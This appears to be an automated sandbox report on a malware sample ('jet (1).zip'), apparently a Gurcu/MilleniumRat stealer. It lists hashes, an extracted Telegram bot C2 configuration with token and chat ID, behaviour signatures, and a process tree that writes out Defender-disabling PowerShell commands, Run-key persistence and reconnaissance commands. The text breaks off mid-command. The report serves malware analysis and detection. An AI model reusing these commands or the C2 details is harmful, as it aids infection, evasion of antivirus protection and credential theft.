Analysis

  • max time kernel
    43s
  • max time network
    49s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-07-2024 18:42

General

  • Target

    jet (1).zip

  • Size

    112.6MB

  • MD5

    de779c3b4e36d82762dfc61ce9c9bbf2

  • SHA1

    6fbd58a60b3095ac4be7700006237ca9a3f5772e

  • SHA256

    5188c69bd772ebe6ca8b34e8c08eec90f63ffcf1d6ab20287e074732da21076a

  • SHA512

    71f857ae4bd5565654c1b4bb049e082d0f4a7d0fa8cb2d789581a35b9cc956f6855f295fb65156721e95c20af6291e2a735067647ed46d46e7f9def021546948

  • SSDEEP

    3145728:HtfPhRs9D5Zi+mHm47bSZvkG5MQbZ+mSUvh044h:HtfPnsLZi+mHm4XSZ35MAB044

Malware Config

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendDocument?chat_id=-1002245526003&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0%20kb

https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendMessage?chat_id=-1002245526003

https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-

https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendDocument?chat_id=-1002245526003&caption=%F0%9F%93%B8Screenshot%20take

Signatures

  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

  • MilleniumRat

    MilleniumRat is a remote access trojan written in C#.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Stops running service(s) 4 TTPs
  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 15 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 24 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Detects Pyinstaller 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Modifies registry key 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:620
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:392
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:672
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:960
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:436
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:876
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                1⤵
                  PID:1052
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:1076
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                      PID:1128
                      • C:\Windows\system32\taskhostw.exe
                        taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                        2⤵
                          PID:2868
                        • C:\Program Files\Google\Chrome\updater.exe
                          "C:\Program Files\Google\Chrome\updater.exe"
                          2⤵
                          • Executes dropped EXE
                          PID:6048
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                        1⤵
                          PID:1236
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                          1⤵
                            PID:1248
                          • C:\Windows\System32\svchost.exe
                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                            1⤵
                              PID:1276
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                              1⤵
                                PID:1364
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                1⤵
                                  PID:1416
                                  • C:\Windows\system32\sihost.exe
                                    sihost.exe
                                    2⤵
                                      PID:2604
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                    1⤵
                                      PID:1440
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                      1⤵
                                        PID:1456
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                        1⤵
                                          PID:1548
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                          1⤵
                                            PID:1632
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                            1⤵
                                              PID:1660
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                              1⤵
                                                PID:1732
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                1⤵
                                                  PID:1752
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:1852
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                    1⤵
                                                      PID:1960
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                      1⤵
                                                        PID:1968
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                        1⤵
                                                          PID:1992
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                          1⤵
                                                            PID:1136
                                                          • C:\Windows\System32\spoolsv.exe
                                                            C:\Windows\System32\spoolsv.exe
                                                            1⤵
                                                              PID:2060
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                              1⤵
                                                                PID:2196
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                1⤵
                                                                  PID:2236
                                                                • C:\Windows\System32\svchost.exe
                                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                  1⤵
                                                                    PID:2296
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                    1⤵
                                                                      PID:2436
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                      1⤵
                                                                        PID:2444
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                        1⤵
                                                                          PID:2620
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                          1⤵
                                                                            PID:2636
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                            1⤵
                                                                              PID:2728
                                                                            • C:\Windows\sysmon.exe
                                                                              C:\Windows\sysmon.exe
                                                                              1⤵
                                                                                PID:2740
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                                1⤵
                                                                                  PID:2788
                                                                                • C:\Windows\System32\svchost.exe
                                                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                                  1⤵
                                                                                    PID:2796
                                                                                  • C:\Windows\system32\wbem\unsecapp.exe
                                                                                    C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                    1⤵
                                                                                      PID:2228
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                      1⤵
                                                                                        PID:2700
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                        1⤵
                                                                                          PID:3316
                                                                                        • C:\Windows\Explorer.EXE
                                                                                          C:\Windows\Explorer.EXE
                                                                                          1⤵
                                                                                            PID:3464
                                                                                            • C:\Windows\Explorer.exe
                                                                                              C:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\jet (1).zip"
                                                                                              2⤵
                                                                                                PID:3144
                                                                                              • C:\Users\Admin\Desktop\jet\jet.exe
                                                                                                "C:\Users\Admin\Desktop\jet\jet.exe"
                                                                                                2⤵
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:1504
                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  3⤵
                                                                                                    PID:1772
                                                                                                  • C:\Users\Admin\Desktop\jet\jet.exe
                                                                                                    "C:\Users\Admin\Desktop\jet\jet.exe"
                                                                                                    3⤵
                                                                                                    • Loads dropped DLL
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:4496
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c
                                                                                                      4⤵
                                                                                                        PID:2348
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c "ver"
                                                                                                        4⤵
                                                                                                          PID:5784
                                                                                                    • C:\Users\Admin\Desktop\jet\loader.exe
                                                                                                      "C:\Users\Admin\Desktop\jet\loader.exe"
                                                                                                      2⤵
                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                      PID:3380
                                                                                                      • C:\Users\Admin\Desktop\jet\loader.exe
                                                                                                        "C:\Users\Admin\Desktop\jet\loader.exe"
                                                                                                        3⤵
                                                                                                        • Loads dropped DLL
                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                        PID:4328
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI33802\Build.exe -pbeznogym
                                                                                                          4⤵
                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                          PID:3180
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI33802\Build.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\_MEI33802\Build.exe -pbeznogym
                                                                                                            5⤵
                                                                                                            • Checks computer location settings
                                                                                                            • Executes dropped EXE
                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                            PID:2492
                                                                                                            • C:\ProgramData\Microsoft\hacn.exe
                                                                                                              "C:\ProgramData\Microsoft\hacn.exe"
                                                                                                              6⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                              PID:2252
                                                                                                              • C:\ProgramData\Microsoft\hacn.exe
                                                                                                                "C:\ProgramData\Microsoft\hacn.exe"
                                                                                                                7⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Loads dropped DLL
                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                PID:3352
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI22522\s.exe -pbeznogym
                                                                                                                  8⤵
                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                  PID:2956
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI22522\s.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\_MEI22522\s.exe -pbeznogym
                                                                                                                    9⤵
                                                                                                                    • Checks computer location settings
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                    PID:2532
                                                                                                                    • C:\ProgramData\main.exe
                                                                                                                      "C:\ProgramData\main.exe"
                                                                                                                      10⤵
                                                                                                                      • Checks computer location settings
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Loads dropped DLL
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:2952
                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp2A38.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp2A38.tmp.bat
                                                                                                                        11⤵
                                                                                                                          PID:8216
                                                                                                                          • C:\Windows\system32\tasklist.exe
                                                                                                                            Tasklist /fi "PID eq 2952"
                                                                                                                            12⤵
                                                                                                                            • Enumerates processes with tasklist
                                                                                                                            PID:6460
                                                                                                                          • C:\Windows\system32\find.exe
                                                                                                                            find ":"
                                                                                                                            12⤵
                                                                                                                              PID:6452
                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                              Timeout /T 1 /Nobreak
                                                                                                                              12⤵
                                                                                                                              • Delays execution with timeout.exe
                                                                                                                              PID:6404
                                                                                                                            • C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe
                                                                                                                              "C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"
                                                                                                                              12⤵
                                                                                                                              • Checks computer location settings
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Checks processor information in registry
                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                              PID:8112
                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
                                                                                                                                13⤵
                                                                                                                                  PID:9772
                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
                                                                                                                                    14⤵
                                                                                                                                    • Adds Run key to start application
                                                                                                                                    • Modifies registry key
                                                                                                                                    PID:9880
                                                                                                                          • C:\ProgramData\svchost.exe
                                                                                                                            "C:\ProgramData\svchost.exe"
                                                                                                                            10⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:4464
                                                                                                                            • C:\ProgramData\svchost.exe
                                                                                                                              "C:\ProgramData\svchost.exe"
                                                                                                                              11⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Loads dropped DLL
                                                                                                                              • Adds Run key to start application
                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                              PID:2716
                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c "ver"
                                                                                                                                12⤵
                                                                                                                                  PID:5192
                                                                                                                            • C:\ProgramData\setup.exe
                                                                                                                              "C:\ProgramData\setup.exe"
                                                                                                                              10⤵
                                                                                                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                              • Drops file in Program Files directory
                                                                                                                              PID:4336
                                                                                                                    • C:\ProgramData\Microsoft\based.exe
                                                                                                                      "C:\ProgramData\Microsoft\based.exe"
                                                                                                                      6⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                      PID:1304
                                                                                                                      • C:\ProgramData\Microsoft\based.exe
                                                                                                                        "C:\ProgramData\Microsoft\based.exe"
                                                                                                                        7⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Loads dropped DLL
                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                        PID:2628
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
                                                                                                                          8⤵
                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                          PID:1988
                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
                                                                                                                            9⤵
                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:2804
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                                                          8⤵
                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                          PID:380
                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                                            9⤵
                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:3444
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
                                                                                                                          8⤵
                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                          PID:868
                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
                                                                                                                            9⤵
                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:1344
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c "start bound.exe"
                                                                                                                          8⤵
                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                          PID:1584
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\bound.exe
                                                                                                                            bound.exe
                                                                                                                            9⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:4312
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\onefile_4312_133652834771665068\loader.exe
                                                                                                                              bound.exe
                                                                                                                              10⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:2336
                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c "start jet.exe"
                                                                                                                                11⤵
                                                                                                                                  PID:5576
                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Contact robio.xyz | discord.gg/input for Help', 0, 'INPUT v2', 48+16);close()""
                                                                                                                            8⤵
                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                            PID:4380
                                                                                                                            • C:\Windows\system32\mshta.exe
                                                                                                                              mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Contact robio.xyz | discord.gg/input for Help', 0, 'INPUT v2', 48+16);close()"
                                                                                                                              9⤵
                                                                                                                                PID:1940
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ‌  .scr'"
                                                                                                                              8⤵
                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                              PID:268
                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ‌  .scr'
                                                                                                                                9⤵
                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                PID:2088
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                              8⤵
                                                                                                                                PID:1912
                                                                                                                                • C:\Windows\system32\tasklist.exe
                                                                                                                                  tasklist /FO LIST
                                                                                                                                  9⤵
                                                                                                                                  • Enumerates processes with tasklist
                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                  PID:1628
                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                8⤵
                                                                                                                                  PID:1916
                                                                                                                                  • C:\Windows\system32\tasklist.exe
                                                                                                                                    tasklist /FO LIST
                                                                                                                                    9⤵
                                                                                                                                    • Enumerates processes with tasklist
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:1104
                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                                                                                  8⤵
                                                                                                                                    PID:4492
                                                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                                                                                                      9⤵
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:5340
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                                                                                    8⤵
                                                                                                                                      PID:1348
                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        powershell Get-Clipboard
                                                                                                                                        9⤵
                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        PID:5384
                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                      8⤵
                                                                                                                                        PID:3996
                                                                                                                                        • C:\Windows\system32\tasklist.exe
                                                                                                                                          tasklist /FO LIST
                                                                                                                                          9⤵
                                                                                                                                          • Enumerates processes with tasklist
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:5368
                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                        8⤵
                                                                                                                                          PID:4232
                                                                                                                                          • C:\Windows\system32\tree.com
                                                                                                                                            tree /A /F
                                                                                                                                            9⤵
                                                                                                                                              PID:5436
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c "systeminfo"
                                                                                                                                            8⤵
                                                                                                                                              PID:456
                                                                                                                                              • C:\Windows\system32\systeminfo.exe
                                                                                                                                                systeminfo
                                                                                                                                                9⤵
                                                                                                                                                • Gathers system information
                                                                                                                                                PID:5428
                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 